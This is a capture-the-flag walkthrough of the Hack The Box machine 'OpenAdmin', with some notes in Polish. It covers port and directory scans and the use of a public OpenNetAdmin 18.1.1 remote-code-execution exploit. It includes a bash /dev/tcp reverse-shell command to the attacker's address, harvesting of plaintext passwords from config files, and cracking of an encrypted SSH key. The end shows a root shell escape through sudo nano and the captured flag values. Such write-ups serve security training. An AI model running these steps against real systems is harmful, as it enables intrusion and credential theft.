HTB OpenAdmin done
OpenAdmin
Notes
Znalezione 3 strony:
artwork
music
sierra
OS:
Linux
Technology:
Opennetadmin 18.1.1
IP Address:
10.129.200.221
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Users and pass:
From: /opt/ona/www/config/auth_ldap.config.php
password: mysecretbindpassword
---
From /opt/ona/www/local/config/database_settings.inc.php
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
---
From file: /var/www/internal/index.php
pass: Revealed
---
From /opt/ona/www/local/config/database_settings.inc.php
L: jimmy
P: n1nj4W4rri0R!
---
Password for SSH key id_rsa - joanna
P: bloodninjas
---
SSH - joanna
L: joanna
P: bloodninjas
---
Nmap
┌──(.venv)─(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.203.219_nmap 10.129.203.219 ; cat 10.129.203.219_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 16:01 CET
Nmap scan report for 10.129.203.219
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Ffuz
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ffuf -u http://10.129.4.30/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.4.30_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.4.30/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : 10.129.4.30_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
artwork [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 51ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/artwork/FUZZ
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 40ms]
music [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/music/FUZZ
sierra [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/sierra/FUZZ
[INFO] Starting queued job on target: http://10.129.4.30/artwork/FUZZ
about.html [Status: 200, Size: 11156, Words: 2960, Lines: 293, Duration: 56ms]
blog.html [Status: 200, Size: 11523, Words: 3338, Lines: 297, Duration: 32ms]
contact.html [Status: 200, Size: 8999, Words: 2524, Lines: 244, Duration: 41ms]
css [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 47ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/css/
fonts [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/fonts/
images [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/images/
index.html [Status: 200, Size: 14461, Words: 4026, Lines: 372, Duration: 46ms]
js [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 45ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/js/
main.html [Status: 200, Size: 931, Words: 69, Lines: 18, Duration: 51ms]
readme.txt [Status: 200, Size: 410, Words: 47, Lines: 9, Duration: 40ms]
services.html [Status: 200, Size: 11749, Words: 3197, Lines: 308, Duration: 31ms]
single.html [Status: 200, Size: 17627, Words: 5502, Lines: 368, Duration: 32ms]
[INFO] Starting queued job on target: http://10.129.4.30/music/FUZZ
artist.html [Status: 200, Size: 20133, Words: 877, Lines: 508, Duration: 52ms]
blog.html [Status: 200, Size: 6728, Words: 430, Lines: 174, Duration: 31ms]
category.html [Status: 200, Size: 23863, Words: 1020, Lines: 659, Duration: 44ms]
contact.html [Status: 200, Size: 6223, Words: 302, Lines: 178, Duration: 42ms]
css [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 41ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/css/
img [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 39ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/img/
index.html [Status: 200, Size: 12554, Words: 764, Lines: 356, Duration: 46ms]
js [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 68ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/js/
main.html [Status: 200, Size: 931, Words: 69, Lines: 18, Duration: 34ms]
playlist.html [Status: 200, Size: 8885, Words: 469, Lines: 272, Duration: 41ms]
[INFO] Starting queued job on target: http://10.129.4.30/sierra/FUZZ
about-us.html [Status: 200, Size: 20785, Words: 8310, Lines: 349, Duration: 37ms]
blog.html [Status: 200, Size: 20477, Words: 8481, Lines: 334, Duration: 39ms]
contact.html [Status: 200, Size: 15853, Words: 5469, Lines: 288, Duration: 41ms]
css [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/css/
elements.html [Status: 200, Size: 24524, Words: 10082, Lines: 426, Duration: 34ms]
fonts [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/fonts/
img [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 34ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/img/
index.html [Status: 200, Size: 43029, Words: 14866, Lines: 589, Duration: 58ms]
js [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 51ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/js/
portfolio.html [Status: 200, Size: 13000, Words: 4229, Lines: 230, Duration: 100ms]
service.html [Status: 200, Size: 22090, Words: 8827, Lines: 364, Duration: 39ms]
vendors [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/vendors/
:: Progress: [122814/122814] :: Job [4/4] :: 655 req/sec :: Duration: [0:02:35] :: Errors: 0 ::
Open website: http://10.129.4.30/music/
http://10.129.4.30/music/
After cliking "Login" on website I got redirect to http://10.129.4.30/ona
Open website: http://10.129.4.30/ona
I found info about software:
Opennetadmin
18.1.1
Find exploit
[OpenNetAdmin 18.1.1 - Remote Code Execution](https://github.com/amriunix/ona-rce)
Download exploit
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ git clone https://github.com/amriunix/ona-rce.git
Cloning into 'ona-rce'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 11 (delta 4), reused 9 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (11/11), 552.45 KiB | 3.84 MiB/s, done.
Resolving deltas: 100% (4/4), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py check http://10.129.4.30/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py exploit http://10.129.4.30/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$
Create a revshell
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py exploit http://10.129.200.221/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ bash -c 'exec bash -i &>/dev/tcp/10.10.14.76/80 <&1'
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.200.221] 46282
bash: cannot set terminal process group (1381): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ python -c 'import pty; pty.spawn("/bin/bash")'
<www$ python -c 'import pty; pty.spawn("/bin/bash")'
Command 'python' not found, but can be installed with:
apt install python3
apt install python
apt install python-minimal
Ask your administrator to install one of them.
You also have python3 installed, you can run 'python3' instead.
www-data@openadmin:/opt/ona/www$ whereis python3
whereis python3
python3: /usr/bin/python3.6m /usr/bin/python3.6 /usr/bin/python3 /usr/lib/python3.7 /usr/lib/python3.8 /usr/lib/python3.6 /usr/lib/python3 /etc/python3.6 /etc/python3 /usr/local/lib/python3.6 /usr/share/python3 /usr/share/man/man1/python3.1.gz
www-data@openadmin:/opt/ona/www$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<ww$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$
Read config file: /opt/ona/www/config/auth_ldap.config.php
Find password: mysecretbindpassword
---
www-data@openadmin:/opt/ona/www/config$ cat auth_ldap.config.php
cat auth_ldap.config.php
<?php
/*
Uncomment and set the following to enable ldap auth settings for your environment
It is best to make a copy of this file and put it into the following path:
/opt/ona/www/local/config/auth_ldap.config.php
This file is for documentation purposes and will be overwritten during
upgrades of ONA. The ldap code was patterend from the DokuWiki auth
plugins. You can find documentation here that may be of use in
defining values below: http://www.dokuwiki.org/auth:ldap
*/
// Common settings and debugging
//$conf['auth']['ldap']['debug'] = 'true';
//$conf['auth']['ldap']['version'] = '3';
//$conf['auth']['ldap']['server'] = 'ldap://ldap.example.com:389';
// Active Directory DN bind as user example
//$conf['auth']['ldap']['binddn'] = '%{user}@example.local';
//$conf['auth']['ldap']['usertree'] = 'DC=example,DC=local';
//$conf['auth']['ldap']['userfilter'] = '(sAMAccountName=%{user})';
//$conf['auth']['ldap']['grouptree'] = 'DC=example,DC=local';
//$conf['auth']['ldap']['groupfilter'] = '(&(cn=*)(Member=%{dn})(objectClass=group))';
//$conf['auth']['ldap']['mapping']['grps'] = array('memberOf'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['referrals'] = '0';
// Novell E-Directory, anonymous bind example
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=users,ou=example,o=com';
//$conf['auth']['ldap']['mapping']['grps'] = array('groupmembership'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['userfilter'] = '(&(!(loginDisabled=TRUE)))';
//OpenLDAP with superuser bind
//$conf['auth']['ldap']['binddn'] = 'cn=Manager,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=People,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['grouptree'] = 'ou=Group,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['groupfilter'] = '(&(objectClass=posixGroup)(|(memberUid=%{dn})(memberUid=%{user})))';
www-data@openadmin:/opt/ona/www/config$
Read config: /opt/ona/www/local/config/database_settings.inc.php
Find creds to database:
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
---
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
Login as user: jimmy
L: jimmy
P: n1nj4W4rri0R!
---
www-data@openadmin:/home$ su jimmy
www-data@openadmin:/home$ su jimmy
su jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:/home$ ls -a
ls -a
. .. jimmy joanna
jimmy@openadmin:/home$ cd ~
cd ~
jimmy@openadmin:~$ ls -a
ls -a
. .. .bash_history .bash_logout .bashrc .cache .gnupg .local .profile
Find two interesing files (infos about hash and id_rsa)
jimmy@openadmin:~$ id
id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
jimmy@openadmin:~$
jimmy@openadmin:~$ find / -group internal 2>/dev/null
find / -group internal 2>/dev/null
/var/www/internal
/var/www/internal/main.php
/var/www/internal/logout.php
/var/www/internal/index.php
jimmy@openadmin:~$
---
file: /var/www/internal/index.php
___
...
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
}
?>
...
---
file: /var/www/internal/main.php
___
jimmy@openadmin:/var/www/internal$ cat main.php
cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Crack hash
hash:
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
pass: Revealed
Read apache config: /etc/apache2/sites-available/internal.conf
www-data@openadmin:/etc/apache2$ cat sites-available/internal.conf
cat sites-available/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
www-data@openadmin:/etc/apache2$ ss -tulpn | grep 52846
ss -tulpn | grep 52846
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.203.219] 50536
bash: cannot set terminal process group (1366): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www$ ss -tulpn
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
Create SSH tunnel
L: jimmy
P: n1nj4W4rri0R!
---
┌──(.venv)─(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh [email protected] -L 52846:localhost:52846
The authenticity of host '10.129.203.219 (10.129.203.219)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.203.219' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Mar 20 19:46:42 UTC 2025
System load: 0.0 Processes: 169
Usage of /: 30.8% of 7.81GB Users logged in: 0
Memory usage: 9% IP address for ens160: 10.129.203.219
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$
Login to local website
L: jimmy
P: Revealed
---
http://localhost:52846/
Read SSH key for user joanna
http://localhost:52846/main.php
---
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
Don't forget your "ninja" password
Click here to logout Session
Cracking SSH key (id_rsa) for user joanna
Password for id_rsa: bloodninjas
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh2john id_rsa_joanna > id_rsa_joanna.hash
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_joanna.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa_joanna)
1g 0:00:00:02 DONE (2025-03-20 21:52) 0.3344g/s 3202Kp/s 3202Kc/s 3202KC/s bloodofyouth..bloodmore23
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ chmod 0700 id_rsa_joanna
Read flag: user.txt
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh [email protected] -i id_rsa_joanna
Enter passphrase for key 'id_rsa_joanna':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Mar 20 20:57:06 UTC 2025
System load: 0.11 Processes: 175
Usage of /: 30.9% of 7.81GB Users logged in: 1
Memory usage: 9% IP address for ens160: 10.129.203.219
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Mar 20 20:56:42 2025 from 10.10.14.92
joanna@openadmin:~$ cd ~
joanna@openadmin:~$ ls -al
total 36
drwxr-x--- 5 joanna joanna 4096 Jul 27 2021 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 2019 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 2019 .bashrc
drwx------ 2 joanna joanna 4096 Jul 27 2021 .cache
drwx------ 3 joanna joanna 4096 Nov 22 2019 .gnupg
-rw-r--r-- 1 joanna joanna 807 Nov 22 2019 .profile
drwx------ 2 joanna joanna 4096 Nov 23 2019 .ssh
-r-------- 1 joanna joanna 33 Mar 20 15:01 user.txt
joanna@openadmin:~$
joanna@openadmin:~$ cat user.txt
6a50a40601205c00c62eb74f75f87787
joanna@openadmin:~$
Privilege Escalation
sudo -l
joanna@openadmin:/home$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:/home$
joanna@openadmin:/home$ file /opt/priv
/opt/priv: empty
joanna@openadmin:/home$ ls -la /opt/priv
-rw-r--r-- 1 root root 0 Nov 22 2019 /opt/priv
GTFOBins - nano
https://gtfobins.github.io/gtfobins/nano/#sudo
---
sudo nano
^R^X
reset; sh 1>&0 2>&0
Read flag: root.txt
cd /root M-F New Buffer
ls -la
total 36
drwx------ 6 root root 4096 Mar 20 15:01 .
drwxr-xr-x 24 root root 4096 Aug 17 2021 ..
lrwxrwxrwx 1 root root 9 Nov 21 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Aug 17 2021 .cache
drwx------ 3 root root 4096 Nov 21 2019 .gnupg
drwxr-xr-x 3 root root 4096 Aug 17 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Mar 20 15:01 root.txt
drwx------ 2 root root 4096 Nov 21 2019 .ssh
cat root.txt
c3c33eca21a5ce3e817a197f76469029
References
[OpenNetAdmin 18.1.1 - Remote Code Execution](https://github.com/amriunix/ona-rce)
[GTFOBins - nano](https://gtfobins.github.io/gtfobins/nano/#sudo)
Lessons Learned